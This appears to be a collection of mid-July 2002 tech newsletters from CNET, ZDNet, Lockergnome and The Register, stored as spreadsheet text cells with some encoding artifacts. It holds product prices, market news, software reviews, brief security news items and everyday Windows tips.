Second-quarter announcements are likely to meet with deep investor skepticism, despite an outlook that is slowly improving.July 15,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'Jaguar' may show its claws at MacWorld
Correspondent Melissa Francis and CNET News.com reporter Ian Fried talk about Jaguar, the anticipated update to Mac OS X and new, larger iMac flat-panel screens, both expected to be unveiled at this week's MacWorld.
 Watch Video
Â Â EnterpriseAutodesk trims executive payAMD to unveil chip amid earnings woesSun sends forth first version of LibertyE-BusinessDow takes a beating as confidence wanesU.S. government plans online ID gatewayNew entrants in search for low airfaresCommunicationsU.S. says WorldCom books cooked in 2000Qwest mulls bids for phone book unitEarthLink uncorks broadband in SeattleMediaLiquid Audio rejects buyout offerTech execs: Hands off P2PChina threatens new Web penaltiesPersonal TechnologyAre Mac users smarter?Linux finds room on Wal-Mart shelvesFuture fuzzy for Adobe camera software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</si>
  <si>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
CNET Shopper Newsletter: Components Edition
Shopper
											All CNET
											The Web
										Â 
									1
Dell Dimension 8000
2
Toshiba Sat. 5105-S607
3
Canon PowerShot G2
4
Dell Latitude C400
5
Nikon Coolpix 995
Â 
		All most popular
					July 15, 2002
							Dear Reader.
Whether you're building a new system or just want to
upgrade your old one, finding the right RAM for your
configuration is crucial to your system's success.But with so many motherboards on the market, sometimes
it can be tricky finding the exact RAM to meet your system's
requirements.Luckily, CNET's all-in-one Memory Configurator makes finding 
the perfect memory easier than ever! Whatever your motherboard 
type, you're just a few clicks away from the upgrade you'll 
need to get your system living up to its full potential.Check out CNET's new Memory Configurator
Pentium 4 (2.0 GHz 512KB, 400MHz, Socket 478)
â€¢ Lowest price: $190Pentium 4 (2.2 GHz 512KB, 400MHz, Socket 478)
â€¢ Lowest price: $232Pentium 4 (2.4GHz, 512KB, 400MHz, Socket 478)
â€¢ Lowest price: $358 
AMD to unveil chip amid earnings woes
						Advanced Micro Devices will have good news for customers this 
   week, but bad news for investors. 
Rambus revenue up from year ago
						Rambus, a developer of technology that speeds the performance 
   of computer-memory chips, on Thursday reported fiscal third-
   quarter earnings that rose from a year ago as revenue steadied.
Server company releases new AMD model
						Angstrom Microsystems, a small Boston company specializing in 
   thin servers, has released a new model that squeezes two servers, 
   each with two Advanced Micro Devices Athlon 2100+ processors, into 
   a case that's 1.75-inches, or "1U," thick. The system, designed to 
   be bolted into regular 19-inch racks, typically costs between 
   $4,000 and $5,000, depending on configuration options, spokeswoman 
   Rachel Sun said. 
Tune-Up: The mother of all upgrades
Looking to completely overhaul your PC? Start by replacing 
   your motherboard.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</si>
  <si>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CNET Shopper Weekly Newsletter
Shopper
											All CNET
											The Web
										Â 
									1
Dell Dimension 8000
2
Toshiba Sat. 5105-S607
3
Canon PowerShot G2
4
Dell Latitude C400
5
Nikon Coolpix 995
Â 
		All most popular
Is your PC acting a bit sluggish? Does is sometimes choke on large graphics files or spend 
more time than ever spinning its hard drive?Adding more RAM to your system may be the perfect answer to
your computing woes. With more RAM, you'll be able to get 
more out of your favorite games, graphics applications, and 
other resource-intensive applications. Unfortunately, figuring out what type of RAM to buy can be both 
difficult and frustrating. Luckily, CNET's all-in-one Memory Configurator makes finding 
the perfect memory easier than ever! Whatever type of system
you have, your just a few clicks away from the upgrade you'll 
need to get your system living up to its full potential.Check out CNET's new Memory Configurator
IBM Deskstar 120GXP 
								â€¢ 120GB
								â€¢ 7200 rpm
								â€¢ DMA/ATA-100 (Ultra) EIDE
								Â Â Lowest Price: $136Lite-On CD-RW
								â€¢ 40X/12X/48X EIDE
								â€¢ 1 year warranty
								â€¢ SMART Burn
								Â Â Starting at: $69Pioneer DVR-A04 DVD-RW EIDE
								â€¢ 4.7GB 2X/1X/6X DVD
								â€¢ 8X/4X/24X CD  
								â€¢ EIDE/ATAPI DVD-RW/CD-RW
								Â Â Lowest Price: $289HP DVD-Writer DVD100i drive
								â€¢ Burn your own DVD
								â€¢ 12x10x32x CD-RW, 2.4x8x DVD
								â€¢ Internal EIDE 
								Â Â Lowest Price: $235Western Digital Caviar WD1200JB 120GB
								â€¢ High Performance
								â€¢ Ultra ATA/100 Interface 
								â€¢ 7200 RPM, 8MB buffer, OEM
								Â Â Lowest Price: $169Iomega Predator CD-RW
								â€¢ 8x/4x/32x
								â€¢ External USB 
								â€¢ 650 MB capacity
								Â Â Lowest Price: $67 Did you know that ChannelOnline's StoreSite enables you 
to set up a private storefront with your company name and 
logo in less than an hour?Your customers can view quotes you have created for them, 
search the product database, build their own quotes based
on the pricing you've predetermined for them, and place 
orders with you online, 24/7.ross profit available to you on both quotes and 
orders. Sign up now to give your customers a whole new level of 
service. 
Tell me more about ChannelOnline.
Tech Trends
Hardware
Software
Shopping
Downloads
News
Investing
Electronics
Web Building
Help &amp; How-Tos
Internet
Games
Message Boards
CNET TV &amp; Radio
Music CenterThe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</si>
  <si>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CNET Investor Dispatch
Quote LookupEnter symbol:Â· Symbol Lookup
Quotes delayed 20+ minutes
â€¢ My Portfolio
â€¢ Broker Reports
â€¢ IPOs
â€¢ Splits
â€¢ Messages
Â 
SGMA
3.43
29.43%
Â 
APHT
4.17
24.11%
Â 
ZOMX
4.28
22.29%
Â 
ICTS
6.45
19.42%
Â 
CAFE
2.97
18.33%
Â 
STIZ
2.351
-29.82%
Â 
AMTCW
1.6
-28.89%
Â 
DSGIF
1.83
-25.00%
Â 
HGPI
1.9
-24.00%
Â 
MTMS
3.1
-22.50%
Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 15, 2002 DJIA8639.19 Â -45.34
 NASDAQ1382.54 Â 9.04
 S&amp;P 500917.92 Â -3.47
 CNETÂ TECH1,005.33 Â 15.22Techs rise, but Dow falls on day of Bush speech
Technology shares climbed Monday as Pres. Bush gave a speech outlining a plan for long-term growth.Tech investors also heard positive comments on Intel by C.S. First Boston, and snapped up shares in the chip, storage and computer server hardware sectors. CNET's Tech index rose 15.22 points, or 1.53 percent, to 1,005.33, and the tech-heavy Nasdaq composite index gained 9.04 points, or 0.65 percent, to 1,382.54.Amid news of a weakening dollar and an unexpected rise in business inventories in May, broader markets sank. Recovering some from early-day losses, the Dow Jones industrials finished by giving up 45.4 points, or 0.52 percent, to 8,639.1, and the S&amp;P 500 slid 3.47 points, or 0.38 percent, to 917.92.
Will IBM's new "Shark" sink or swim? 
IBM announced a new top-end "Shark" storage system Monday that could boost the company's prospects against entrenched competitors in the depressed storage market.
Three years ago, IBM introduced its first Enterprise Storage System product, code-named Shark, in an attempt to rebuild a market it had almost totally ceded to rivals EMC and Hitachi Data Systems.INTL BUSINESS MACHINES 71.00 2.59% New products help absorb AMD pain 
Advanced Micro Devices turned out two new chips Monday, but its most anticipated release this week will be its second quarter results.
As expected, AMD launched on Monday a new mobile Athlon XP 1800+ chip for notebooks. The company also announced Monday it has begun shipping MirrorBit, its newest flash memory product for storing data in cell phones and other devices.ADVANCED MICRO DEV 9.25 1.65% Microsoft tries to steal Macworld thunder 
Microsoft on Monday launched the first of several pre-emptive strikes against Apple Computer's Macworld trade show by making announcements about new technologies far ahead of their delivery to market.
The strategic attack comes as tensions mount between Apple and Microsoft. During Macworld five years ago, the two companies announced a five-year technology agreement, whereby Microsoft committed to continued development of Office and Internet Explorer for the Mac.MICROSOFT CORP 51.80 -0.12% 
Also from CNET
Real-time stock quotes from CNET News.com Investor.30-day free trial!
C.S. First Boston expects an upbeat outlook from Intel in tech notes 7/15/02 
Analyst Tim Mahon predicts the chip titan will report second-quarter results in-line with expectations, but offer better-than-expected guidance for the third quarter. Intel rival AMD's poor quarterly results stemmed more from company-specific issues than PC market troubles, Mahon says. And he points to other evidence of PC strength, such as Dell's positive comments about the current quarter. Mahon also expects Intel to speak confidently about its new 845G chipset, which he suggests could pressure the shares of graphics chip firms. Mahon reiterates a "buy" rating on Intel.INTEL CORP 19.12 6.28% 
Visit the Brokerage Center
EMC appoints independent director to board 
No. 1 data storage machine maker EMC Corp. on Monday said it named an outsider to its board of directors, bowing to pressure from shareholders who said the board had too many insiders.EMC said Gail Deegan, the former chief financial officer of Houghton Mifflin Co., will become the eighth member of its board, filling a seat left vacant since the fall. Deegan, 55, will also be a member of the audit committee.EMC CORP 9.10 6.43%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qqqqqqqqqq-cnet-newsletters@spamassassin.taint.orgUnsubscribeÂ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</si>
  <si>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
Software NewsletterSoftware
                                Â 
Mozilla 1.0mIRC 6.02PolyView 3.8FruitMenu 2.0 (for the Mac)Dell Latitude C510/C610 seriesÂ 
In HardwareToshiba Pocket PC e310 
In ElectronicsAutoCAD LT 2002 
In SoftwareSony Ericsson T68 
In Wireless
July 15, 2002
                                                --Lindsey Turrentine
                                                Senior editor
                                                CNET Software and Internet
Â Dear Readers,
If the best things in life are free, why does software cost so
much? Back in the day (that day being 1999, when the Internet was
the Next Big Thing), you could get almost all of your
software--e-mail, fax services, online desktops, you name it--for
free. Now, even Yahoo is charging for some of its formerly free mail services, including the ability to check your Yahoo mail from Outlook or another desktop e-mail client.
But if you look closely enough, you can still find some
worthwhile free apps. We've reviewed four free e-mailers to get you started. And we've also
taken a peek at the new BearShare, which is not only
free itself, but also lets you share music and media files at no
cost. Of course, whether you can find legal music to share is
another matter entirely.                                                Â Intel's new insides: one size fits all?The i845 chipset's many flavors are faster, better, and a lot more confusing. Read before you shop.
	â€¢ Dell's prefab PC
	â€¢ Apple cracks 1GHzMost popular
Desktops
	1. Dell Dimension 8000 series
	2. HP Pavilion 950 
	3. Dell Dimension 4000 series
	4. Atlas Micro CS 8000
	5. Falcon Northwest Mach V
 See all most popular desktops
Roundup: CNET reviews four free Web e-mailers
Yahoo now charges for services that were once free; Hotmail
   dumps accounts without so much as an explanation. So-called
   free Web-based e-mailers aren't quite as free-wheelin' as
   before. Are the savings worth the hassle? We take another
   look at so-called "free" e-mailers.
   Get the gear you need to burn DVDs
DVD authoring is one of the hottest new hobbies around, but
   picking out the right equipment can be a daunting task.
   We've broken down the process and selected the best gear
   for the job, from camera to software, burner to DVD player.
BearShare 4.0
The latest version of this oft-overlooked Gnutella client
   lets you pay $19.95 for ad-free file sharing and offers a
   nice, clean interface and a chat client to boot. Plus,
   BearShare lets you opt out of bundled adware and spyware
   when you install it. Should you run to this app like a bear
   to honey? Not yet. We'll tell you why.Read the reviewÂ |Â Manufacturer priceYahoo MailÂ  
After months of beta testing and pricing adjustments (that's right, Yahoo now charges for some services), the new Yahoo Mail just hit the Web. Among its changes are a complete redesign, better Calendar and Address Book integration, and a new color palette. Find out if Yahoo still deserves your account.Read the review
Peachtree Complete Accounting 2003
For years, Peachtree has provided professional accounting to
   small businesses. As a result, Peachtree Complete 2003 has
   all the basics, including inventory control, time billing,
   and payroll management. And Peachtree even contains a wide
   array of Web tools for creating and maintaining an online
   store. What's new in 2003?Read the reviewÂ |Â Check latest pricesFirst Take: ICQ Lite Alpha
 One of our biggest beefs with ICQ has always been its
   bloated feature set. Now, the company has released a new
   "lite" ICQ that sucks up far less system memory than the
   full-fat version--but at what cost? We take a first look. SBC Yahoo Dial
 Thanks to a partnership with SBC Pacific Bell, Yahoo is now
   in the dial-up game. The new service, known as SBC Yahoo
   Dial, offers a customized browser, 25MB of storage, and 11
   e-mail addresses--all for $21.95 or lower, depending on
   your SBC service package. Our reviewer investigates.Read the reviewFirst Take: Winamp3 Release Candidate   We've been waiting aeons for the newest version of popular
   media player Winamp. We haven't received a full new version
   yet, but AOL has partially obliged with a prerelease
   version. Winamp3 Release Candidate serves up a new interface
   and some major underlying changes. But does the new look
   muddy up Winamp's legendary ease of use?
Inside @ccess: Is your ISP safe from hackers?
   Surely, the folks who run your ISP have thought long and hard
   about security issues, but should you count on their skills to
   ward off intruders? Not wise, says our ISP expert. In this
   week's column, Dan Tynan takes security matters into his own
   hands and shows you how to protect yourself.
	Read the column
CNET Electronics: Cell phone personality test--updated
 Choose among our five user profiles to find out what models
   best match your wireless persona. Take the test and see them
   all.
	Read the full story
Import Hotmail addresses to Outlook?  &gt;I'm running Windows 98. Everytime I try to download files
   &gt;from the Internet, QuickTime tries to upgrade, stopping the
   &gt;download cold. I tried to remove the software, but it won't
   &gt;let me. Can you help? I would like to use Windows Media
   &gt;Player instead. --Wicked
 Based on your desription, we're guessing that QuickTime pops
   up when you try to stream a media file (video, audio, or MP3s)
   from the Web. If so, this probably means that you have
   QuickTime set as your default media player for all media
   files. And since your version of QuickTime is out-of-date,
   whenever it launches, it attmepts to upgrade. You could simply
   upgrade the program, or you can to turn off the autoupgrade
   feature. In QuickTime 5.0, open the program, select Edit &gt;
   Preferences &gt; QuickTime Preferences. Uncheck the box labeled
   "Check for updates automatically."
   If, however, you simply prefer to use Windows Media Player,
   open that program, click Tools &gt; Options. Select the Formats
   tab, then check the boxes next to all of the file types that
   you want Windows Media Player to open. To make sure that
   QuickTime doesn't override your WMP settings, uncheck those
   file types within QuickTime.
CNET reviews QuickTime 5.0
CNET reviews Windows Media Player 7.1
E-mail your stories and questions to: software-mailbag@cnet.com.Live tech help: submit your questions now
CNET News.com: Top CIOs on the future of IT
Find a job you love, with more than 1 million postings
ZDNet: This IT director has had enough of Microsoft
May Editors' Choice award: Pioneer's HTS-910DV
Â 
SearchÂ Â In SoftwareAll CNETÂ Â Â Â The Web
Â Â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</si>
  <si>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Preinstalled Mandrake Linux PCs go live at Walmart
    Will the public love them?
        http://www.theregister.co.uk/content/4/26192.html    Confirmed: MS to ship beefed up 802.11 security in XP SP1
    Surely not a reason to upgrade from Win2k? You amaze us...
        http://www.theregister.co.uk/content/4/26188.htmlEnterprise Systems    Citrix to pink slip 10 per cent
    Decimation, 21st century style
        http://www.theregister.co.uk/content/53/26186.htmlPersonal Hardware    PC prices plummet in Europe
    No Mercy
        http://www.theregister.co.uk/content/54/26180.htmlSemiconductors    Mobile Athlon, AMD fanboy spat, Intel price cuts
    HWRoundupFunny underdog
        http://www.theregister.co.uk/content/3/26194.htmlInternet    Webmaster conference held in London pub
    We'll drink to that
        http://www.theregister.co.uk/content/6/26193.htmlNet Security    Security industry's hacker-pipming slammed
    Somebody had to say it
        http://www.theregister.co.uk/content/55/26198.html    PGP Vuln exposed  by Outlook plug-In
    Pretty Poor Privacy?
        http://www.theregister.co.uk/content/55/26184.htmlBusiness    Interoute buys part of Ebone
    Etc
        http://www.theregister.co.uk/content/7/26196.html    Vodafone sues Daily Telegraph for libel
    Very short story
        http://www.theregister.co.uk/content/7/26191.html    Vallance recounts WorldCom war stories
    From 'mug' to 'smug'
        http://www.theregister.co.uk/content/7/26189.html    Archie Norman lined up for Energis as banks take over
    Poisoned Chelys?
        http://www.theregister.co.uk/content/7/26187.html    Another year of telco turmoil - C&amp;W
    Toimurl, if you're from Brooklyn
        http://www.theregister.co.uk/content/7/26182.htmle-business    E-business lives on, says EDS 
    Poke it with a stick and see if it moves
        http://www.theregister.co.uk/content/23/26197.html    Liberty Alliance proposes Web security standards 
    LAP dancing at the OASIS
        http://www.theregister.co.uk/content/23/26183.htmlSite News    Reg Cancer Busters donates 1,000 years
    Site News Reg SETI@Home team regroups
        http://www.theregister.co.uk/content/31/26190.html    Eclipse in broadband promo
    Reg reader offer
        http://www.theregister.co.uk/content/31/26185.html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</si>
  <si>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20020716 Lockergnome Windows Daily
Â  07.16.2002 GnomeREPORT Hackers and crackers respect only one thing: strong security. Keep the bad guys out of your PC or network with the advanced technology that's trusted by millions: ZoneAlarm Pro 3.0. This best-in-class personal firewall stops hackers cold, defends your online privacy,and sets up in minutes. Click here to download now!Well, it's been half a week since we released it, and we're still
getting record downloads for our first
FREE Gnometome. What does
that mean? Simple. Download all you want - we'll definitely make
more. In fact, we've found a way to get your products and services
a little bit of unlimited promotion on the side, too. And who
couldn't use a little more traffic nowadays? Well, unless your
data transfer bill is already sky high (which can happen when you
get featured). It's all fun and games until someone's server falls
to its knees. We're still sitting
at #5 on Amazon. If we ever
hit #1, I'll eat my hat. And, mind you, this hat has been sitting
around for quite a while; it smells like feet. You'd have to eat
three sombreros just to get the same amount of nutrition you'd get
from my hat. You're better off just going for the free stuff, I
suppose. The next time they ask: "Do you care to Super Size that?"
You can respond, with dignity: "My funds are sufficient for the
upgrade; I avoided spending money on something that would have
lasted longer, supported a helpful cause, and not have killed me
earlier." It makes sense - if you think about it. The fries aren't
going to eat themselves. And if YOU don't eat the fries, who will?Put your hunger aside for just a moment. It's time for a paragraph
I like to call: "Why you shouldn't sign up for DirectDSL." They
went out of their way to send me an unsolicited e-mail this
evening. Now, I know what you're thinking: "How kind of them,
Chris. You were just asking about DSL providers in yesterday's
issue. They must have read your mind!" No, they must have rented a
list of addresses which weren't confirmed. But the fun didn't stop
there. I received a message about DirectTV from yet ANOTHER
marketing company. Their effort was indeed caught by this crafty
eye, and my money will be diverted to other (less-spammish)
businesses in the future. It's my "direct" way of saying: you're
not the only game in town. Anybody else care to test my patience?
I didn't think so. My blacklist gets shared with 250,000 people
from around the world. Oops! My Inbox just got slammed with more
junk; looks like Lycos will never get another click from me,
either. See what you get when you tempt fate?My good buddy, Bill,
tells me that Speakeasy.net
provides great DSL connections. He'll even get the credit if I
sign up through his affiliate link! Paul Howes agrees with him,
too: "Static IPs are the norm, they do not use PPPoE, and they
encourage people to run servers on their DSL connection. When
looking at their packages, I suggest you look at the 'Home
Services' page. They even have ADSL up to 1.5M downstream / 768k
upstream, which I have not seen from any other provider. And that
is less than $200 a month, which is a bargain when you start
looking at the prices of a 768k SDSL line!" And Stuart Portner is
chock full of common sense: "Remember that a lot of DSL providers
give you the modem for free and prefer that you use theirs - at
least for initial setup / shakedown period." All the more fries
for me, dude!
See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Chris PirilloÂ Â Â Â Â Â Â 
Â GnomeCONFERENCE
$99 Pre-Registration / $150 At The Door
Â GnomeDOWNLOADSToday's Downloads
AppPlus 3.24
EaseBackup 3.70
HotCrypt 4.12
Arles Image Web Pa 4.94
Smasher 2.9.12
The Bat! 1.61
WinSafe 1.1.2
Privacy Eraser 1.68
Zero Popup 3.0
WinPulse 1.01Company Overview v1.3 [389k] W9x/2k/XP FREEhttp://www.toteboard.net/Models/company_overview.htm
{Check your stocks} When you're doing long-term investing, the
best thing to do with your money is to invest and then "forget
about it." Our Gnomie buddy Brian Stevens is the type of guy that
likes to play the stock market. He's always logging into E*TRADE
and checking on his stocks. That's a lot of work! We told him to
forget about it and let Company Overview do the work. This Excel
spreadsheet and add-in is a great way to check stocks and save the
data into a separate Excel spreadsheet. Brian says, "E*TRADE
doesn't give me half the information that Company Overview does,
such as insider trades and financial trends, along with many other
tidbits of information." NOTE: You must use Excel 2000 or higher
for the spreadsheet to operate correctly.
Flexible Renamer v5.2.0 [426k] W9x/2k/XP FREEhttp://hp.vector.co.jp/authors/VA014830/english/FlexRena/
{Rename your files} I work with a lot of files throughout the day,
and sometimes I end up with a desktop cluttered with useless
copies and shortcuts - and you KNOW how I feel about clutter. I
don't need a reminder that there are five shortcuts or six copies
of something on my desktop... and that is where Flexible Renamer
comes into the picture. With Flexible Renamer, I can cut off the
"Shortcut to" and "Copy of" prefixes from all my files, making
them a lot easier to read. That's not all though... you can even
make a .txt file on your desktop into a .doc document in seconds.
If you don't like your filename in all caps, then just switch them
to lower case and vice-versa. The possibilities are endless! (You
know, I always wanted to change my own name from "Chris" to
"Caspian Wildflowers"...)Recommend It!
Â GnomeCLICKS
Â GnomeSYSTEM
Disk Investigator v1.1 [527k] W9x/2k/XP FREEhttp://www.theabsolute.net/sware/dskinv.html
{Restore deleted files} Have you ever deleted a file from your PC,
realizing later that you actually needed it? Yeah, me too. Best-
case scenario, I would just go to the Recycle Bin and retrieve my
deleted file. But what if I had already emptied the Recycle Bin?
(Horrors!) Luckily, Disk Investigator can come into play and save
the day. (Yay!) With Disk Investigator, I can view deleted files
or directories, and restore them if necessary. I no longer have to
wonder if I fully deleted a troublesome file... I just load up
Disk Investigator, and I'll know if the file is gone (with 100%
certainty)!
Recommend It!
Â GnomeWILDCARD
Actual Title Buttons 1.3 [1.0M] W9x/2k/XP $19.95
    Unearthed by Michael Tretyakovhttp://www.actualtools.com/
{Windows Explorer add-on} "Actual Title Buttons lets you add the
new Minimize To Tray and Stay On Top buttons to any program's
title bar next to the Windows standard Minimize/Maximize/Close
buttons." This program is a must for anyone who wants to avoid the
distractions of other windows popping up over your active windows.
While writing this review, I am using the "Stay On Top" command
for Notepad, and during this time I have already received five
instant messages. Why is this important? Normally these messages
would pop up in front of Notepad and disrupt my work... but with
Actual Title Buttons, I can keep typing without missing those
"important" instant messages. The only difference is that they
aren't an annoyance now. The "Minimize To Tray" feature is great,
too, because freeing up taskbar space is a beautiful thing...
especially when you don't have to close down your programs to do
it.
Submit Your Thoughts | Recommend It!
Â GnomeFAVORITEWE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today!Electricon Landhttp://www.electriconland.com/
{Icons for your machine} Gretchen and I are really looking forward
to moving to our new neighborhood in a little over a month.
Everything is better with a little dash of friendliness, right?
Icons are no exception. All the action on this website is based
around a city block of Electriconland. You walk into different
stores to get different pixel art icons. Walk into Gabu's Pub and
you will find icons in the likeness of Pink Floyd. You won't be
disappointed when you go around the corner and pick up your
Avengers icons from the comic store. If all this wasn't good
enough then maybe this fact alone will send you to the street of
Electriconland... all the icons are cross platform. This means you
can have your new favorite icons on your Windows, Mac, and Linux
machine, or maybe even a different one on each. The possibilities
are endless!Recommend It!
Â GnomeTIPI just hate it when I try to install a program and the
installation fails. I hate it even more when the program doesn't
leave a log file to help me track down the problem. Some would say
I am out of luck, but as long as the program uses Windows
Installer, then I am on Cloud Nine. Why am I so happy? Because for
any program that uses Windows Installer, I can turn on logging
through the Registry. Navigate to HKEY_LOCAL_MACHINE \ Software \
Policies \ Microsoft \ Windows \ Installer. Add a new String
value, double-click it, and enter the following Value data:
"voicewarmup" (sans quotes). These letters can be entered in any
order: v = Verbose output; o = Out- of-disk-space messages; i =
Status messages; c = Initial UI parameters; e = All error
messages; w = Non-fatal warnings; a = Start up of actions; r =
Action-specific records; m = Out-of- memory or fatal exit
information; u = User requests; p = Terminal properties. If you
add a plus, the existing file will be appended. If you add an
exclamation mark, each line is flushed. Now, when something fails,
I just have to check in the "Temp" directory and look for my log
files. They'll vary in name, but will always start with "Msi" and
end with the .LOG extension. As always, make sure to backup your
registry before making any modifications.
Recommend It!http://www.lockergnome.com/issues/daily/20020716.html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how Sprocket thinks he has a right to eat pumpkin seeds. Or, would that be "pupkin" seeds?Not for the Puppy
Â 
CLICK HERE TO ZOOMÂ Â 
BYTE ME NOWÂ©2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read our Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered at DNS Central.
A hamburger by any other name ordinarily costs about twice as much.
</t>
  </si>
  <si>
    <t xml:space="preserve">
ZDNet AnchorDesk NewsletterTUESDAY, JULY 16, 2002
Why we're changing our publishing schedule
Dear Reader,As of Monday, July 15, AnchorDesk is being published on Mondays, Wednesdays, and Fridays, instead of five days a week. The AnchorDesk Weekly newsletter will continued to be published every FridayWhy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you.Having additional time also means I will be able to work on several projects I've been assigned, including one that could bear fruit at the Consumer Electronics Show next January. More about that soon, once all the details are nailed down.For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there.Sincerely,
David Coursey
Executive Editor
AnchorDesk
Sign up for more free newsletters from ZDNetThe e-mail address for your subscription isÂ qqqqqqqqqq-zdnet@spamassassin.taint.orgUnsubscribeÂ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</si>
  <si>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
Buyer's Alert | July 16, 2002When ordering, make sure the reseller/manufacturer 
provides the rebate coupon you need.Expires July 5, 2002
$50 off Cidco Mailstation with subscriptionExpires July 31, 2002
Get a car cassette adapter and power adapter FREE with Rio Volt SP250Expires August 31, 2002
$20 off SideWinder Strategic CommanderExpires September 30, 2002
$20 off Rio 600 64MB
$20 off Nike PSA (120)
$20 off RioVolt SP90
Expires March 3, 2003
$10 off Microsoft Natural Keyboard Pro PS2/USB HandheldsÂ Â 
1.Toshiba Pocket PC e310
Â 2.Palm m5153.Handspring Treo 904.Toshiba Pocket PC e7405.Compaq iPaq H3835More Top 
            Selling Products...Â 
Dear Reader,
Personal lasers come in shapes, sizes, and prices to suit almost 
any user. A low-end desktop laser printer can cost as little as 
$199 or as much as $500, but most hover around $300 and strike a 
good balance between speed, quality, and features. The less expensive 
models will suit students or home users who need to print letters 
or homework assignments, as well as perform other simple tasks. 
In pricier models, vendors typically add more RAM, higher-capacity 
paper trays, duplexing capabilities, and networking options for 
corporate and small-business users. Check out a few of our favorites below and find the laser printer
with the right price and features for you!Brother HL-1440
Lowest price: $249HP LaserJet 1200
Lowest price: $319Lexmark E320
Lowest price: $230Samsung ML-1450
Lowest price: $231Xerox Phaser 3400
Lowest price: $627
Â 
Â Â Minolta Dimage F100Friendly to digital novices and enthusiasts alike, the Minolta
Dimage F100 combines innovative automatic technology and advanced
manual controls in a very portable package.Read Review | Check Prices Â Â Â NEC-Mitsubishi MultiSync LCD1550V flat panelThis thin monitor is one of the best values in its price class; it's sleek, compact, and stylish, with very good performance.
Read Review | Check Prices
Â 
$50K-a-day Giveaway from Dell Home Systemsâ€¦Buy any new Dell Home System on or before July 31, 2002 and you'll
be automatically entered to win $50,000. The next lucky winner
could be you!
Â 
Â 
Please note 
            that prices fluctuate and may have changed since the sending of this 
            newsletter. Lowest prices listed are usually after rebates (but 
            please check with the reseller, sometimes the rebate is included in 
            their price). 
Sony DVP-NS900VPrice recently dropped 24%			Lowest price: $610
Creative Labs Nomad Jukebox 6GBPrice recently dropped 31%			Lowest price: $150
Monitor Dell P992 19 inch (17.9 VIS) GrayPrice recently dropped 12%			Lowest price: $379 
SPECIAL FEATUREDid you know that CNET ChannelOnline enables your sales team to 
view pricing and product availability in real time?ChannelOnline's Quote &amp; Procure displays up-to-the-minute pricing 
and availability from multiple distributors - so you can get your
customers what they need, when they need it.You'll be able to:
View data from your select distributors
Compare negotiated pricing for all your distributors
Determine which SKUs are available at your suppliers' warehousesTell me more about Quote &amp; ProcureElsewhere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
Sign up for more free newsletters from ZDNetThe e-mail address for your subscription isÂ qqqqqqqqqq-zdnet@spamassassin.taint.org
UnsubscribeÂ |
Â Change e-mail formatÂ |
Â Change e-mail addressÂ |
Â FAQÂ |
Â AdvertiseHome |eBusiness | Security | Networking | Applications | Platforms | Hardware | Careers
        Copyright 2002 CNET Networks, Inc. All rights reserved. ZDNet is a registered service mark of CNET Networks, Inc.          
</t>
  </si>
  <si>
    <t xml:space="preserve">Tech Update TodayVITAL SIGNS FOR JULY 15, 2002David Berlind
Bridging the gap between Liberty and Microsoft
It appears that we are closer to a solution for single sign-on and identity management. But what if Microsoft chooses not to support  Liberty's specifications?Let's look at the worst-case scenarioLatest from ZDNet News
White House reviews security backbone
HP deletes e-business software
Breaking the wireless speed barrier?
Pentium 4 to power Dell budget PCs
AMD chips at mobile, flash markets
Norway cancels Microsoft contract
Hackers challenge Internet monitoringMore Enterprise News
Farber's PicksDanFarberMicrosoft stresses security for ExchangeMicrosoft is readying a new Exchange Server e-mail system, with improved security, a facelift for Outlook, and better support for cell phones and other handhelds. The upcoming version, the company's first major update of the product since releasing Exchange 2000 nearly two years ago, will by default disable certain messaging features to prevent hackers and virus makers from taking advantage of openings. While Microsoft's biggest nemesis in the e-mail and messaging market is Lotus, the company also competes against Novell and newcomer Oracle, which plans to release its own e-mail and messaging software later this year. 
Read the full storyIBM puts more bite in 'Shark'Can IBM's release of a new top-end "Shark" enterprise storage system boost the company's prospects in the depressed storage market? Big Blue has fixed many early Shark problems, improving everything from data transfer capabilities to cache size, and adding RAID 10 support and Eliza self-healing features. But IBM faces the still dominant EMC, which last week lured away Mark Lewis from HP to become its new CTO; and Hitachi, which  still boasts the technology edge. IBM's edge is its ability to bundle Shark sales with related server and service deals.
Read the full story
Report: Linux hack attacks on the rise
Hackers are increasingly targeting Linux-based Web servers, while the number of successful attacks on Windows systems has decreased, according to a new report.  Linux server applications are often vulnerable to attack because of mismanagement, according to the study, which urges Linux system administrators to be more vigilant about patching known security bugs. 
Read the full story
Frethem worm variant:  "Re: Your password!"An e-mail message that promises to reveal secret information with a password is a variant from the pesky Frethem worm family. Frethem.k (aka w32.frethem.k@mm) is a more robust version of Frethem.e, which uses its own SMTP engine to send e-mail using addresses obtained from infected systems. Mac and Linux users are not affected. Read the full storyAn improved CLIEWith the CLIE PEG-T665C, Sony took everything good about the PEG-T615C--including its terrific color screen and solid design--and added a faster processor and MP3 support to make quite an attractive Palm OS PDA. But with Pocket PCs now selling for less than this CLIE and a whole new Palm OS on the horizon, is this the right time to invest in the T665C?
Read the full review
Write me at dan.farber@cnet.com
Back to topAlso on Tech Update Today
COMMENTARYÂ Handle employee relations with careERM is the latest relationship management buzzword. Adrian Mello helps you get beyond the marketing hype by weighing the merits of employee portals.
 DownloadsÂ How to defrag your hard drive--and speed up your PCLooking for a quick way to rev up a sluggish system? Try defragmenting your hard drive. Since the Windows defrag tool is less than ideal, Preston Gralla shows you three downloads that do a better job of it.
 PREVIOUSLY ON TECH UPDATE TODAYÂ Unplugged: FBI CIO Darwin John
In the twilight of his career, an IT veteran takes on the formidable task of transforming the FBI's antiquated technology infrastructure.  Crucial Clicks--products worth looking at
NetworkingFind the right home network Choosing the right technology to match your networking needs is vital. Here's help in making the choice.Read reviewsMost Popular ProductsNetworking
1. Linksys EtherFast wireless AP
2. Linksys EtherFast router
3. Siemens SpeedStream router
4. Wireless 802.11B Router
5. NetGear HE102 802.11a wireless AP
More popular networking products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
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</si>
  <si>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20020716 Lockergnome Tech Specialist
Â  07.16.2002 GnomeREPORT 
"A network administrators tool kit" 
OpalisRobot automates a broad range of admin tasks 
including system monitoring, corrective action and 
job scheduling. It detects and corrects system errors 
&amp; automates jobs, enabling proactive management of 
business-critical servers. 
Download &amp; test-drive OpalisRobot today! Being that I have a print subscription to PocketPC Magazine, 
I haven't been by their website in quite some time, so when 
Hal Goldstein informed me of a new electronic delivery 
